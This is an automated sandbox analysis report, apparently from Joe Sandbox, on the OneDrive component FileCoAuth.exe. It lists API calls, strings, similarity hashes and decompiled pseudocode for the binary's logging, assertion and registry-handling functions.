    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: LoggingStructured$EventEvent@@Needed@@Parameter@@@RotateWrite
    • String ID: SyncEngineFileInfoProvider::GetPropertyHandlerFromUri$d:\dbs\sh\odib\0313_155253\cmd\24\client\onedrive\product\filecoauth\filecoauth\syncenginefileinfoprovider.cpp
    • API String ID: 2559330748-3724481269
    • Opcode ID: f3336e1ca62b3dff2e326e6325daf5d12f23293cad29c4108de039d8e7ad127f
    • Instruction ID: 03c1581f921314def6554ad8b691a340d77b9f8dd3600c0652808ebad31e7c66
    • Opcode Fuzzy Hash: f3336e1ca62b3dff2e326e6325daf5d12f23293cad29c4108de039d8e7ad127f
    • Instruction Fuzzy Hash: D301ED74A00309AFCB04DF68DC46BAFBBB0EB9D300F40412EF806BA281C6B06A018B44
    Uniqueness

    Uniqueness Score: -1,00%

    APIs
    • ?LoggingWriteStructuredEvent@@YGXPBDI0ABU_GUID@@IIIQAUStructuredEventParameter@@@Z.LOGGINGPLATFORM(d:\dbs\sh\odib\0313_155253\cmd\24\client\onedrive\product\filecoauth\filecoauth\syncenginefileinfoprovider.cpp,00000067,SyncEngineFileInfoProvider::GetPropertyHandlerFromFileId,00EA7810,362B50B0,00000001,00000002,00000001), ref: 00E93D98
    • ?LoggingRotateIfNeeded@@YGXXZ.LOGGINGPLATFORM ref: 00E93D9E
    Strings
    • d:\dbs\sh\odib\0313_155253\cmd\24\client\onedrive\product\filecoauth\filecoauth\syncenginefileinfoprovider.cpp, xrefs: 00E93D82
    • SyncEngineFileInfoProvider::GetPropertyHandlerFromFileId, xrefs: 00E93D7B
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: LoggingStructured$EventEvent@@Needed@@Parameter@@@RotateWrite
    • String ID: SyncEngineFileInfoProvider::GetPropertyHandlerFromFileId$d:\dbs\sh\odib\0313_155253\cmd\24\client\onedrive\product\filecoauth\filecoauth\syncenginefileinfoprovider.cpp
    • API String ID: 2559330748-3436440607
    • Opcode ID: 79864ad5d11328438f2e1f41f449b02f4da9d2f0b18575ce0fe9513f3b51cff8
    • Instruction ID: a3f8737d655dc9b1a1db7cb71381f0751bac65cce2de1ea42b87c8cb4c7d738c
    • Opcode Fuzzy Hash: 79864ad5d11328438f2e1f41f449b02f4da9d2f0b18575ce0fe9513f3b51cff8
    • Instruction Fuzzy Hash: 1201AD74A45209ABDF14DF68DC96BAEBBB4EB8D704F50411EF816BF280C6B16A05CB44
    Uniqueness

    Uniqueness Score: -1,00%

    APIs
    • ?LoggingWriteStructuredEvent@@YGXPBDI0ABU_GUID@@IIIQAUStructuredEventParameter@@@Z.LOGGINGPLATFORM(d:\dbs\sh\odib\0313_155253\cmd\24\client\onedrive\product\filecoauth\filecoauth\syncenginefileinfoprovider.cpp,0000006C,SyncEngineFileInfoProvider::GetPropertyHandlerFromFileId,00EA7810,66B31198,00000001,00000002,00000001), ref: 00E93EF0
    • ?LoggingRotateIfNeeded@@YGXXZ.LOGGINGPLATFORM ref: 00E93EF6
    Strings
    • d:\dbs\sh\odib\0313_155253\cmd\24\client\onedrive\product\filecoauth\filecoauth\syncenginefileinfoprovider.cpp, xrefs: 00E93EDA
    • SyncEngineFileInfoProvider::GetPropertyHandlerFromFileId, xrefs: 00E93ED3
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: LoggingStructured$EventEvent@@Needed@@Parameter@@@RotateWrite
    • String ID: SyncEngineFileInfoProvider::GetPropertyHandlerFromFileId$d:\dbs\sh\odib\0313_155253\cmd\24\client\onedrive\product\filecoauth\filecoauth\syncenginefileinfoprovider.cpp
    • API String ID: 2559330748-3436440607
    • Opcode ID: ab55dc4cce313beda002d35a865576dc791687a5edc14caca1a78524e21b71d2
    • Instruction ID: 2d8d445964a34803b6cbc665b7a8d8f1bb556619ac2ee5c155c1deb718ac3b4e
    • Opcode Fuzzy Hash: ab55dc4cce313beda002d35a865576dc791687a5edc14caca1a78524e21b71d2
    • Instruction Fuzzy Hash: 7101C474A41309AFDB04DF69DC46BAFBBB4EB5E700F50411EF846BB280C6B16A05CB44
    Uniqueness

    Uniqueness Score: -1,00%

    C-Code - Quality: 25%
    			E00E9E837() {
    				intOrPtr _v4;
    				intOrPtr _v20;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				signed int _t13;
    				intOrPtr* _t21;
    				intOrPtr _t22;
    				intOrPtr _t31;
    				intOrPtr* _t34;
    
    				_push(_v20);
    				L00EA29EC();
    				_pop(_t21);
    				_push(0);
    				_push(0);
    				L00EA3138();
    				asm("int3");
    				_t34 = _t21;
    				_t31 = _v4;
    				_t22 =  *((intOrPtr*)(_t34 + 4));
    				asm("cdq");
    				_t13 = ( *((intOrPtr*)(_t34 + 8)) - _t22) / 0x11c;
    				if(_t13 < _t31) {
    					asm("cdq");
    					_t15 = (_t22 -  *_t34) / 0x11c;
    					if(0xe6c2b4 - (_t22 -  *_t34) / 0x11c < _t31) {
    						__imp__?_Xlength_error@std@@YAXPBD@Z("vector<T> too long");
    					}
    					_push(E00E9E54E(_t34, _t15 + _t31));
    					_t13 = E00E9E6A1(0x11c, _t34, _t31, _t34, _t15 + _t31);
    				}
    				return _t13;
    			}

    0x00e9e837 0x00e9e83a 0x00e9e83f 0x00e9e840 0x00e9e842 0x00e9e844 0x00e9e849 0x00e9e851 0x00e9e859 0x00e9e85f 0x00e9e864 0x00e9e865 0x00e9e869 0x00e9e874 0x00e9e875 0x00e9e87b 0x00e9e882 0x00e9e882 0x00e9e892 0x00e9e895 0x00e9e895 0x00e9e89e

    APIs
    • ??3@YAXPAX@Z.MSVCR120 ref: 00E9E83A
    • _CxxThrowException.MSVCR120(00000000,00000000), ref: 00E9E844
    • ?_Xlength_error@std@@YAXPBD@Z.MSVCP120(vector<T> too long), ref: 00E9E882
    Strings
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: ??3@ExceptionThrowXlength_error@std@@
    • String ID: vector<T> too long
    • API String ID: 2603369972-3788999226
    • Opcode ID: f7f2d0e261133080f429d370010314545679ef50423f9b2225501217681886bc
    • Instruction ID: 87c134617c4e83cdc47e9aab4195626e218983b4acd65c8a64361101a700fa18
    • Opcode Fuzzy Hash: f7f2d0e261133080f429d370010314545679ef50423f9b2225501217681886bc
    • Instruction Fuzzy Hash: 69F096363402142BCA1CEAAD9C56A6EBADACBED720F245429F746F7392CC61BC108194
    Uniqueness

    Uniqueness Score: -1,00%

    C-Code - Quality: 18%
    			E00E91F75(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8) {
    				struct HINSTANCE__* _t7;
    				_Unknown_base(*)()* _t8;
    				intOrPtr* _t12;
    
    				_t12 = __ecx;
    				if( *__ecx == 0) {
    					if( *((intOrPtr*)(__ecx + 4)) == 0) {
    						L6:
    						return 1;
    					}
    					return RegDeleteKeyW();
    				}
    				_t7 = GetModuleHandleW(L"Advapi32.dll");
    				if(_t7 == 0) {
    					goto L6;
    				}
    				_t8 = GetProcAddress(_t7, "RegDeleteKeyTransactedW");
    				if(_t8 == 0) {
    					goto L6;
    				}
    				return  *_t8(_a4, _a8, 0, 0,  *_t12, 0);
    			}

    0x00e91f7b 0x00e91f82 0x00e91fb5 0x00e91fc0 0x00000000 0x00e91fc2 0x00e91fba 0x00e91fba 0x00e91f89 0x00e91f91 0x00000000 0x00000000 0x00e91f99 0x00e91fa1 0x00000000 0x00000000 0x00000000

    APIs
    • GetModuleHandleW.KERNEL32(Advapi32.dll), ref: 00E91F89
    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyTransactedW), ref: 00E91F99
    Strings
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: AddressHandleModuleProc
    • String ID: Advapi32.dll$RegDeleteKeyTransactedW
    • API String ID: 1646373207-2168864297
    • Opcode ID: 4f8fbac519bc8ccb15f5ff45f51e24393e6c46f274cbc5a954db5b1681aa3c1e
    • Instruction ID: 4dfcd4b92880961fdc85b23a08cee66563c81a9e1e175fbf2eb45a1ae9282575
    • Opcode Fuzzy Hash: 4f8fbac519bc8ccb15f5ff45f51e24393e6c46f274cbc5a954db5b1681aa3c1e
    • Instruction Fuzzy Hash: 37F08237304209BA8F311A56AC08D677BE8EFCBBA2305547AF455F1010D731A88AE660
    Uniqueness

    Uniqueness Score: -1,00%

    C-Code - Quality: 16%
    			E00E959AD() {
    				signed int _v8;
    				intOrPtr _v24;
    				char* _v28;
    				char _v32;
    				signed int _t7;
    				void* _t11;
    				void* _t14;
    				void* _t15;
    				void* _t16;
    				signed int _t17;
    
    				_t7 =  *0xeb0090; // 0xbb40e64e
    				_v8 = _t7 ^ _t17;
    				_v28 = "moniker";
    				_v32 = 3;
    				_v24 = 2;
    				__imp__?LoggingWriteStructuredEvent@@YGXPBDI0ABU_GUID@@IIIQAUStructuredEventParameter@@@Z(0x4b, "RunningObjectTableHelper::GetObjectW", 0xea7d10, 0xe181350, 1, 1,  &_v32);
    				__imp__?LoggingRotateIfNeeded@@YGXXZ();
    				return E00EA29F2(_t11, _v8 ^ _t17, _t14, _t15, _t16, "d:\\dbs\\sh\\odib\\0313_155253\\cmd\\17\\client\\onedrive\\product\\ux\\shared\\runningobjecttablehelper.cpp");
    			}

    0x00e959b5 0x00e959bc 0x00e959c2 0x00e959e4 0x00e959eb 0x00e959f2 0x00e959f8 0x00e95a0b

    APIs
    • ?LoggingWriteStructuredEvent@@YGXPBDI0ABU_GUID@@IIIQAUStructuredEventParameter@@@Z.LOGGINGPLATFORM(d:\dbs\sh\odib\0313_155253\cmd\17\client\onedrive\product\ux\shared\runningobjecttablehelper.cpp,0000004B,RunningObjectTableHelper::GetObjectW,00EA7D10,0E181350,00000001,00000001,00000000), ref: 00E959F2
    • ?LoggingRotateIfNeeded@@YGXXZ.LOGGINGPLATFORM ref: 00E959F8
    Strings
    • RunningObjectTableHelper::GetObjectW, xrefs: 00E959D8
    • d:\dbs\sh\odib\0313_155253\cmd\17\client\onedrive\product\ux\shared\runningobjecttablehelper.cpp, xrefs: 00E959DF
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: LoggingStructured$EventEvent@@Needed@@Parameter@@@RotateWrite
    • String ID: RunningObjectTableHelper::GetObjectW$d:\dbs\sh\odib\0313_155253\cmd\17\client\onedrive\product\ux\shared\runningobjecttablehelper.cpp
    • API String ID: 2559330748-295430105
    • Opcode ID: 3697de5d0449d3308135046bceb15dcf6cf096e3024b86ef211ab70caed07f01
    • Instruction ID: 09122b9f404f349c69a1def7d253d353e5521608645c86033eb7b0b375fd583a
    • Opcode Fuzzy Hash: 3697de5d0449d3308135046bceb15dcf6cf096e3024b86ef211ab70caed07f01
    • Instruction Fuzzy Hash: FAF08271A44308AFC700EF55CC0BBAFBBB4AB5EB00F405119B9457A281C6B17A098B94
    Uniqueness

    Uniqueness Score: -1,00%

    APIs
    • ?LoggingWriteStructuredEvent@@YGXPBDI0ABU_GUID@@IIIQAUStructuredEventParameter@@@Z.LOGGINGPLATFORM(d:\dbs\sh\odib\0313_155253\cmd\17\client\onedrive\product\ux\shared\runningobjecttablehelper.cpp,00000050,RunningObjectTableHelper::GetObjectW,00EA7D10,EBE5568C,00000001,00000000,00000000,00E955AC,?,d:\dbs\sh\odib\0313_155253\cmd\17\client\onedrive\product\ux\shared\runningobjecttablehelper.cpp,00000049), ref: 00E95A2A
    • ?LoggingRotateIfNeeded@@YGXXZ.LOGGINGPLATFORM(?,d:\dbs\sh\odib\0313_155253\cmd\17\client\onedrive\product\ux\shared\runningobjecttablehelper.cpp,00000049,?,?,?,?,RunningObjectTableHelper::GetObjectW), ref: 00E95A30
    Strings
    • RunningObjectTableHelper::GetObjectW, xrefs: 00E95A1E
    • d:\dbs\sh\odib\0313_155253\cmd\17\client\onedrive\product\ux\shared\runningobjecttablehelper.cpp, xrefs: 00E95A25
    Similarity
    • API ID: LoggingStructured$EventEvent@@Needed@@Parameter@@@RotateWrite
    • String ID: RunningObjectTableHelper::GetObjectW$d:\dbs\sh\odib\0313_155253\cmd\17\client\onedrive\product\ux\shared\runningobjecttablehelper.cpp
    • API String ID: 2559330748-295430105
    • Opcode ID: 8147df401e24712878e9bd4cb05fe2cfed9bdd22cf29c9b09c6f64720a11aaec
    • Instruction ID: 7df8461c51ec80e3a885e2a7624c2ebc60d3a2645a460b5310ab5903c742e9c4
    • Opcode Fuzzy Hash: 8147df401e24712878e9bd4cb05fe2cfed9bdd22cf29c9b09c6f64720a11aaec
    • Instruction Fuzzy Hash: B1C04C713D53407EE520AB119D0BF0A6D61576FF12F15641073957C0D285E13055891C
    Uniqueness

    Uniqueness Score: -1,00%

    C-Code - Quality: 44%
    			E00E990D4(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
    				void* _t33;
    				intOrPtr* _t35;
    				intOrPtr* _t36;
    				intOrPtr _t57;
    				void* _t72;
    				void* _t73;
    
    				_push(0x64);
    				E00EA3161(E00EA3C4B, __ebx, __edi, __esi);
    				_t72 = __edx;
    				E00E991E6(__ecx,  *((intOrPtr*)(_t73 + 0xc)),  *((intOrPtr*)(_t73 + 0x10)),  *((intOrPtr*)(_t73 + 8)));
    				_t57 =  *0xeb17dc; // 0x0
    				if(_t57 != 0) {
    					E00E9A26F(__ebx, _t57);
    				}
    				_t33 = 0;
    				asm("lock cmpxchg [edx], ecx");
    				if(0 != 1) {
    					_t35 =  *0xeb17d4; // 0x0
    					if(_t35 != 0) {
    						 *_t35( *((intOrPtr*)(_t73 + 8)),  *((intOrPtr*)(_t73 + 0xc)),  *((intOrPtr*)(_t73 + 0x10)),  *((intOrPtr*)(_t73 + 0x14)));
    					}
    					_t36 =  *0xeb17d0; // 0x0
    					_t80 = _t36;
    					if(_t36 != 0) {
    						 *_t36();
    					}
    					E00E94E9D(_t73 - 0x70,  *((intOrPtr*)(_t73 + 0x14)));
    					 *(_t73 - 4) = 0;
    					E00E94E9D(_t73 - 0x58,  *((intOrPtr*)(_t73 + 0xc)));
    					 *(_t73 - 4) = 1;
    					E00E94E9D(_t73 - 0x40,  *((intOrPtr*)(_t73 + 8)));
    					 *(_t73 - 4) = 2;
    					E00E94E9D(_t73 - 0x28, _t72);
    					 *(_t73 - 4) = 3;
    					__imp__?RecordFailedAssert@QoS@@YAXABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@00I0_N@Z(_t73 - 0x28, _t73 - 0x40, _t73 - 0x58,  *((intOrPtr*)(_t73 + 0x10)), _t73 - 0x70, 1);
    					E00E94307(_t73 - 0x28, 1, 0);
    					E00E94307(_t73 - 0x40, 1, 0);
    					E00E94307(_t73 - 0x58, 1, 0);
    					 *(_t73 - 4) =  *(_t73 - 4) | 0xffffffff;
    					E00E94307(_t73 - 0x70, 1, 0);
    					E00E9A4C3(1, 0, _t72, _t80);
    					_t33 =  *0xeb1830; // 0x0
    					if(_t33 != 0) {
    						_t33 = CloseHandle(_t33);
    						 *0xeb1830 = 0;
    					}
    					DebugBreak();
    				}
    				return E00EA313E(_t33);
    			}

    APIs
    • __EH_prolog3.LIBCMT ref: 00E990DB
      • Part of subcall function 00E991E6: ?LoggingWriteStructuredEvent@@YGXPBDI0ABU_GUID@@IIIQAUStructuredEventParameter@@@Z.LOGGINGPLATFORM(d:\dbs\sh\odib\0313_155253\cmd\17\client\onedrive\product\ux\shared\failfast.cpp,0000001B,FailFastTrace,00EA7D10,CC2F8C83,00000001,00000003,?,00000000), ref: 00E9928A
      • Part of subcall function 00E991E6: ?LoggingRotateIfNeeded@@YGXXZ.LOGGINGPLATFORM ref: 00E99290
    • ?RecordFailedAssert@QoS@@YAXABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@00I0_N@Z.TELEMETRY(?,?,?,?,?,00000001,?,00000000,?,?,?,?,?,00000000,00000064,00E98404), ref: 00E99188
    • CloseHandle.KERNEL32(00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,?,?,00000000, : ,?,?), ref: 00E991CC
    • DebugBreak.KERNEL32(00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,?,?,00000000, : ,?,?), ref: 00E991D8
      • Part of subcall function 00E9A26F: memset.MSVCR120 ref: 00E9A2B0
    Similarity
    • API ID: LoggingStructured$Assert@BreakCloseDebugEventEvent@@FailedH_prolog3HandleNeeded@@Parameter@@@RecordRotateU?$char_traits@_V?$allocator@_V?$basic_string@_W@2@@std@@00W@std@@Writememset
    • String ID:
    • API String ID: 2135731369-0
    • Opcode ID: 785d9e50a4a6a77de1a3426a9ed5390c8804035e3fb85ca8477d9ed3da722510
    • Instruction ID: c2c9d00ba1c931acbe785c6476d0fbe6f4c710cdb9ddf4d2b05cf8a17392c8d0
    • Opcode Fuzzy Hash: 785d9e50a4a6a77de1a3426a9ed5390c8804035e3fb85ca8477d9ed3da722510
    • Instruction Fuzzy Hash: 4E3178B1500259AFCF11EFA6CC85DEE7BB8BF49300F045129F805B71A2DB319A0ACB20
    Uniqueness

    Uniqueness Score: -1,00%

    C-Code - Quality: 93%
    			E00E9F0AC(void* __ebx, void* __edi, void* __esi, void* __eflags) {
    				void* _t27;
    				int _t32;
    				int _t46;
    				void* _t54;
    				short* _t56;
    				void* _t62;
    
    				_push(0x228);
    				_t27 = E00EA3194(E00EA4D05, __ebx, __edi, __esi);
    				_t46 =  *(_t62 + 0x14);
    				_t54 =  *(_t62 + 8);
    				_t56 =  *(_t62 + 0xc);
    				 *(_t62 - 0x230) = _t46;
    				E00E94ED0(_t27,  *_t46,  *((intOrPtr*)(_t46 + 4)));
    				 *((intOrPtr*)(_t46 + 4)) =  *_t46;
    				_t31 =  !=  ? 0x100 : 0;
    				 *(_t62 - 0x22c) =  *(_t62 - 0x22c) & 0x00000000;
    				_t32 = ( !=  ? 0x100 : 0) | 0x00020019;
    				if(_t56[0xa] >= 8) {
    					_t56 =  *_t56;
    				}
    				_t59 =  <=  ? RegOpenKeyExW(_t54, _t56, 0, _t32, _t62 - 0x22c) : _t33 & 0x0000ffff | 0x80070000;
    				if(( <=  ? RegOpenKeyExW(_t54, _t56, 0, _t32, _t62 - 0x22c) : _t33 & 0x0000ffff | 0x80070000) >= 0) {
    					_t46 = 0;
    					do {
    						 *(_t62 - 0x234) = 0xff;
    						_t54 = RegEnumValueW( *(_t62 - 0x22c), _t46, _t62 - 0x210, _t62 - 0x234, 0, 0, 0, 0);
    						_t69 = _t54;
    						if(_t54 != 0) {
    							__eflags = _t54 - 0x103;
    							if(_t54 != 0x103) {
    								__eflags = _t54;
    								_t59 =  <=  ? _t54 : _t54 & 0x0000ffff | 0x80070000;
    							} else {
    								goto L7;
    							}
    						} else {
    							E00E94E9D(_t62 - 0x228, _t62 - 0x210);
    							 *(_t62 - 4) =  *(_t62 - 4) & _t54;
    							_push(_t62 - 0x228);
    							E00E99472(_t46,  *(_t62 - 0x230), _t54, _t59, _t69);
    							 *(_t62 - 4) =  *(_t62 - 4) | 0xffffffff;
    							E00E94307(_t62 - 0x228, 1, _t54);
    							goto L7;
    						}
    						L10:
    						RegCloseKey( *(_t62 - 0x22c));
    						goto L11;
    						L7:
    						_t46 = _t46 + 1;
    					} while (_t54 == 0);
    					goto L10;
    				}
    				L11:
    				return E00EA3152(_t46, _t54, _t59);
    			}

    APIs
    • __EH_prolog3_GS.LIBCMT ref: 00E9F0B6
    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00000000,00000000), ref: 00E9F108
    • RegEnumValueW.ADVAPI32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00E9F14D
    • RegCloseKey.ADVAPI32(00000000), ref: 00E9F1B7
    Similarity
    • API ID: CloseEnumH_prolog3_OpenValue
    • String ID:
    • API String ID: 2466630147-0
    • Opcode ID: 6d9e6c5cc398bb20c2fed02d395bd669c96b31260957cd8fe734c53e3f07fcd0
    • Instruction ID: ef0d95a769d3ea0a4ac14e24c2aaf4f3be0d3995e7c5d76bd7cb8e7e139b36c1
    • Opcode Fuzzy Hash: 6d9e6c5cc398bb20c2fed02d395bd669c96b31260957cd8fe734c53e3f07fcd0
    • Instruction Fuzzy Hash: 2231D672902228EBDF21DF60DC89B9AB7B4FF49310F1141A9E915B7191CB709E84CBA0
    Uniqueness

    Uniqueness Score: -1,00%

    C-Code - Quality: 93%
    			E00E9EF91(void* __ebx, void* __edi, void* __esi, void* __eflags) {
    				void* _t27;
    				int _t32;
    				int _t46;
    				void* _t54;
    				short* _t56;
    				void* _t62;
    
    				_push(0x228);
    				_t27 = E00EA3194(E00EA4D05, __ebx, __edi, __esi);
    				_t46 =  *(_t62 + 0x14);
    				_t54 =  *(_t62 + 8);
    				_t56 =  *(_t62 + 0xc);
    				 *(_t62 - 0x230) = _t46;
    				E00E94ED0(_t27,  *_t46,  *((intOrPtr*)(_t46 + 4)));
    				 *((intOrPtr*)(_t46 + 4)) =  *_t46;
    				_t31 =  !=  ? 0x100 : 0;
    				 *(_t62 - 0x22c) =  *(_t62 - 0x22c) & 0x00000000;
    				_t32 = ( !=  ? 0x100 : 0) | 0x00020019;
    				if(_t56[0xa] >= 8) {
    					_t56 =  *_t56;
    				}
    				_t59 =  <=  ? RegOpenKeyExW(_t54, _t56, 0, _t32, _t62 - 0x22c) : _t33 & 0x0000ffff | 0x80070000;
    				if(( <=  ? RegOpenKeyExW(_t54, _t56, 0, _t32, _t62 - 0x22c) : _t33 & 0x0000ffff | 0x80070000) >= 0) {
    					_t46 = 0;
    					do {
    						 *(_t62 - 0x234) = 0xff;
    						_t54 = RegEnumKeyExW( *(_t62 - 0x22c), _t46, _t62 - 0x210, _t62 - 0x234, 0, 0, 0, 0);
    						_t69 = _t54;
    						if(_t54 != 0) {
    							__eflags = _t54 - 0x103;
    							if(_t54 != 0x103) {
    								__eflags = _t54;
    								_t59 =  <=  ? _t54 : _t54 & 0x0000ffff | 0x80070000;
    							} else {
    								goto L7;
    							}
    						} else {
    							E00E94E9D(_t62 - 0x228, _t62 - 0x210);
    							 *(_t62 - 4) =  *(_t62 - 4) & _t54;
    							_push(_t62 - 0x228);
    							E00E99472(_t46,  *(_t62 - 0x230), _t54, _t59, _t69);
    							 *(_t62 - 4) =  *(_t62 - 4) | 0xffffffff;
    							E00E94307(_t62 - 0x228, 1, _t54);
    							goto L7;
    						}
    						L10:
    						RegCloseKey( *(_t62 - 0x22c));
    						goto L11;
    						L7:
    						_t46 = _t46 + 1;
    					} while (_t54 == 0);
    					goto L10;
    				}
    				L11:
    				return E00EA3152(_t46, _t54, _t59);
    			}

    APIs
    • __EH_prolog3_GS.LIBCMT ref: 00E9EF9B
    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00000000,00000000), ref: 00E9EFED
    • RegEnumKeyExW.ADVAPI32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00E9F032
    • RegCloseKey.ADVAPI32(00000000), ref: 00E9F09C
    Similarity
    • API ID: CloseEnumH_prolog3_Open
    • String ID:
    • API String ID: 3581956906-0
    • Opcode ID: 62b7029f3ffd4048e9717f4d6c361422e784c15a142b04fc7bbf8ea3b856c409
    • Instruction ID: 8bb828f07e9ab3c9f79e519b9037018dbb102f3e435316bdf435602c257e5fa7
    • Opcode Fuzzy Hash: 62b7029f3ffd4048e9717f4d6c361422e784c15a142b04fc7bbf8ea3b856c409
    • Instruction Fuzzy Hash: 0E31D672901228ABDF20DF60CC89BEAB7B4FF49310F1101A9E905B7181DB70AE44CB50
    Uniqueness

    Uniqueness Score: -1,00%

    C-Code - Quality: 37%
    			E00E9EE8E(void* _a4, short* _a8, void* _a12) {
    				short* _t14;
    				signed short _t15;
    				signed short _t19;
    				int _t23;
    				signed short _t26;
    				short* _t28;
    
    				_t28 = _a8;
    				_t22 =  !=  ? 0x100 : 0;
    				_t23 = ( !=  ? 0x100 : 0) | 0x0001000b;
    				if(_t28[8] != 0) {
    					if(_t28[0xa] < 8) {
    						_t14 = _t28;
    					} else {
    						_t14 =  *_t28;
    					}
    					_t15 = RegOpenKeyExW(_a4, _t14, 0, _t23,  &_a12);
    					_t26 = _t15;
    					if(_t26 == 0) {
    						__imp__RegDeleteTreeW(_a12, _t15);
    						_t26 = _t15;
    						_t19 = RegCloseKey(_a12);
    						_a12 = _a12 & 0x00000000;
    						if(_t26 == 0) {
    							if(_t28[0xa] >= 8) {
    								_t28 =  *_t28;
    							}
    							__imp__RegDeleteKeyExW(_a4, _t28, _t23, 0);
    							_t26 = _t19;
    						}
    					}
    					_t18 =  <=  ? _t26 : _t26 & 0x0000ffff | 0x80070000;
    					return  <=  ? _t26 : _t26 & 0x0000ffff | 0x80070000;
    				}
    				return 0x80070057;
    			}

    APIs
    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00000000,00000000), ref: 00E9EED0
    • RegDeleteTreeW.ADVAPI32(00000000,00000000), ref: 00E9EEE0
    • RegCloseKey.ADVAPI32(00000000), ref: 00E9EEEB
    • RegDeleteKeyExW.ADVAPI32(?,?,00000000,00000000), ref: 00E9EF08
    Similarity
    • API ID: Delete$CloseOpenTree
    • String ID:
    • API String ID: 1116079002-0
    • Opcode ID: ebee8780ca26b586614ff65055c76e428bb12833f1c34e42bee5a09ef42051e1
    • Instruction ID: 0d4ec3793e8d0cd1cfc55cab61c09f6d32cf004444bc78087931eef0f03709d8
    • Opcode Fuzzy Hash: ebee8780ca26b586614ff65055c76e428bb12833f1c34e42bee5a09ef42051e1
    • Instruction Fuzzy Hash: A411A032200308AFDF21CF15DC48BA77BA9FB89362F15082AFA55A6250C770EC54CBA0
    Uniqueness

    Uniqueness Score: -1,00%

    C-Code - Quality: 81%
    			E00E9DBE4(void* __ebx, intOrPtr __ecx, void* __edx, intOrPtr __edi, void* __esi, void* __eflags) {
    				signed int _t126;
    				char _t130;
    				char _t140;
    				char _t143;
    				char _t144;
    				void* _t157;
    				void* _t159;
    				void* _t170;
    				void* _t181;
    				void* _t186;
    				signed int _t195;
    				intOrPtr* _t200;
    				char _t201;
    				intOrPtr _t211;
    				intOrPtr _t228;
    				void* _t240;
    				void* _t244;
    
    				_t242 = __esi;
    				_t241 = __edi;
    				_t240 = __edx;
    				_push(0x120);
    				E00EA3194(E00EA4A38, __ebx, __edi, __esi);
    				 *((intOrPtr*)(_t244 - 0x10c)) = __ecx;
    				_t195 =  *(_t244 + 8);
    				 *((intOrPtr*)(_t244 - 0xf8)) =  *((intOrPtr*)(_t244 + 0x14));
    				 *(_t244 - 0xf4) = _t195;
    				 *((intOrPtr*)(_t244 - 0xfc)) = 0;
    				 *((intOrPtr*)(_t244 - 0x108)) = 0;
    				 *((intOrPtr*)(_t244 - 0x104)) = 0;
    				 *((intOrPtr*)(_t244 - 0x100)) = 0;
    				 *(_t244 - 4) = 0;
    				_t246 =  *((intOrPtr*)(_t195 + 0x14)) - 8;
    				if( *((intOrPtr*)(_t195 + 0x14)) < 8) {
    					_t126 = _t195;
    				} else {
    					_t126 =  *_t195;
    				}
    				E00E94E9D(_t244 - 0x40, _t126);
    				 *(_t244 - 4) = 1;
